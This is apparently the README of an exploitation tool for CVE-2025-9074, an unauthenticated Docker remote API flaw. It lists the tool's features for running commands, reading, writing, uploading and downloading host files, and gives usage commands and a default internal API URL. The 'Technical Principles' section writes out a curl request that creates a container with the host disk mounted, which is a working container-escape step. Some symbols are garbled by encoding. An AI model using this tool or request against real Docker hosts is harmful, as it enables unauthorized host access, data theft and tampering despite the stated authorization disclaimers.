## https://sploitus.com/exploit?id=F293DB41-1C34-5C17-A9E6-5E3C2E5D765D
# CVE-2025-9074 Docker Container Command Execution Tool
A powerful Docker remote API vulnerability exploitation tool for security research and testing related to the CVE-2025-9074 vulnerability. ## Key Features
β **Full-automatic container lifecycle management**: Automatically creates temporary containers and cleans up after operations without leaving traces.
β **Intelligent path handling**: Automatically identifies and converts Windows paths to Docker-mounted formats.
β **Full-automatic operation process**: No need to manually enter complex commands; menu-style interaction allows one-click file operations.
β **Cross-platform compatibility**: Perfectly supports Windows and Linux systems.
[Leave space for screenshot here]
## Features
- **Container Operations**
- View running containers
- View all containers (including stopped ones)
- Create new containers
- Stop containers
- Delete containers
- Execute single commands
- Interactive terminal (requires the docker library)
- **Image Management**
- View local images
- Pull new images
- Delete images
- **Host Machine File Operations**
- Upload files to the host machine
- Download files from the host machine
- Read the content of host machine files
- Write files to the host machine
- Automatically handle Windows Docker Desktop path mapping
## Vulnerability Description
CVE-2025-9074 is a security vulnerability in the Docker remote API. Attackers can exploit this vulnerability by accessing the Docker API without authorization to:
- Execute arbitrary commands
- Create containers and mount host machine disks
- Achieve container escape
- Read/write host machine files
## Environment Requirements
- Python 3.6+
### Install Dependencies
Use `requirements.txt` to install all dependencies:
```bash
pip install -r requirements.txt
```
Or install manually:
```bash
pip install requests docker websocket-client
```
## Usage
### Basic Usage
```bash
python CVE-2025-9074-docker-exploit.py
```
### Command Line Parameters
```bash
python CVE-2025-9074-docker-exploit.py [Options]
Options:
-u, --url URL Docker API URL (Default: http://192.168.65.7:2375)
-c, --container ID Specify container ID
-i, --interactive Enter interactive terminal mode
--shell SHELL Specify shell command (Default: /bin/sh)
-h, --help Display help information
```
### Execute Single Command
```bash
python CVE-2025-9074-docker-exploit.py -c whoami
```
### Interactive Terminal
```bash
python CVE-2025-9074-docker-exploit.py -c -i
```
### Custom Docker API URL
```bash
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375
```
## Detailed Features
### Container Operations
1. **View Running Containers**: Displays a list of all running containers.
2. **View All Containers**: Displays all containers (including stopped ones).
3. **Create New Container**: Creates a new container using a specified image.
4. **Stop Containers**: Stops running containers.
5. **Delete Containers**: Deletes containers (can be forced to delete).
6. **Execute Single Command**: Executes a single command within a container.
7. **Interactive Terminal**: Enters the interactive shell of a container.
### Image Management
1. **View Images**: Lists all local images.
2. **Pull Images**: Pull new images from Docker Hub.
3. **Delete Images**: Deletes local images.
### Host Machine File Operations
#### Upload Files to the Host Machine
1. **Upload files to the host machine**
Please enter the local file path: `/path/to/local/file.txt`
Please enter the target directory on the host machine: `D:/temp`
Please enter the target file name (leave it blank to use the original name):
#### Download Files from the Host Machine
1. **Download files from the host machine**
Please enter the file path on the host machine: `D:/temp/file.txt`
Please enter the local save path: `/tmp`
#### Read the Content of Host Machine Files
1. **Read the content of host machine files**
Please enter the file path on the host machine: `D:/temp/file.txt`
#### Write Files to the Host Machine
1. **Write files to the host machine**
Please enter the target directory on the host machine: `D:/temp`
Please enter the file content: Hello, World!
## Windows Docker Desktop Path Mapping
This tool automatically handles path mapping for Windows Docker Desktop:
| Windows Path | Docker Mount Path |
|--------------|-----------------|
| `D:` | `/mnt/host/d` |
| `D:\temp` | `/mnt/host/d/temp` |
| `C:\Windows` | `/mnt/host/c/Windows` |
| `C:\Users\test` | `/mnt/host/c/Users/test` |
Supported input formats:
- `D:` or `D:/`
- `D:\temp` or `D:/temp`
- `"D:\file.txt"` (enclosed in quotes)
- `'D:/file.txt'` (enclosed in quotes)
## Security Notes
β οΈ **Important Notice**:
1. **For Authorized Testing Only**: This tool is used solely for authorized security testing and educational purposes.
2. **Legal Compliance**: Ensure that you have explicit authorization from the target system before using it.
3. **Isolated Environment**: It is recommended to use this tool in an isolated testing environment.
4. **Permissions**: Windows Docker Desktop requires running as an administrator to write to the C drive.
5. **Do Not Abuse**: Using this tool without authorization may violate laws and regulations.
## Technical Principles
### Container Escape
Create a container through the Docker API and mount the hostβs disk:
```bash
curl -X POST "http://:2375/containers/create" \
-H "Content-Type: application/json" \
-d '{
"Image": "python:3.11.7",
"Cmd": ["sleep", "999d"],
"HostConfig": {
"Binds": ["/mnt/host/d:/tmp"]
},
"Tty": true
}'
```
### File Reading/Writing
Read and write host files by executing commands within the container:
```bash
# Write a file
echo "content" > /tmp/file.txt
# Read a file
cat /tmp/file.txt
```
## Troubleshooting
### Container Creation Failure (500 Error)
- Check whether the Docker API is accessible.
- Verify that the path format is correct.
- Confirm that the image exists.
### File Writing Failure
- Windows Docker Desktop requires running as an administrator.
- Check the permissions of the target directory.
### Unable to Start the Interactive Terminal
- Ensure that the docker library is installed: `pip install docker websocket-client`.
- Check whether the terminal supports interactive mode.
## Development and Testing
### Run Tests
```bash
python CVE-2025-9074-docker-exploit.py
```
### Code Structure
```
CVE-2025-9074-docker-exploit.py
βββ Container Management Functions
β βββ get_containers()
β βββ display_containers()
β βββ create_container()
β βββ stop_container()
β βββ delete_container()
βββ Image Management Functions
β βββ get_images()
β βββ display_images()
β βββ pull_image()
β βββ remove_image()
βββ Host File Operations Functions
β βββ upload_file_to_host()
β βββ download_file_from_host()
β βββ read_file_from_host()
β βββ write_file_to_host()
βββ Utility Functions
βββ normalize_host_path()
βββ create_container_with_mount()
βββ start_container()
βββ stop_and_remove_container()
```
## Contributions
Feel free to submit issues and pull requests! ## License
This project is intended only for educational and security research purposes. ## Disclaimer
This tool is used solely for authorized security testing and educational purposes. Users must bear all responsibilities and risks associated with using this tool. The author does not assume responsibility for any misuse or unauthorized use of this tool. ## References
- Details about the CVE-2025-9074 vulnerability
- Docker Remote API documentation
- Windows Docker Desktop path mapping rules
[source-iocs-preserved url=http://192.168.65.7:2375οΌ]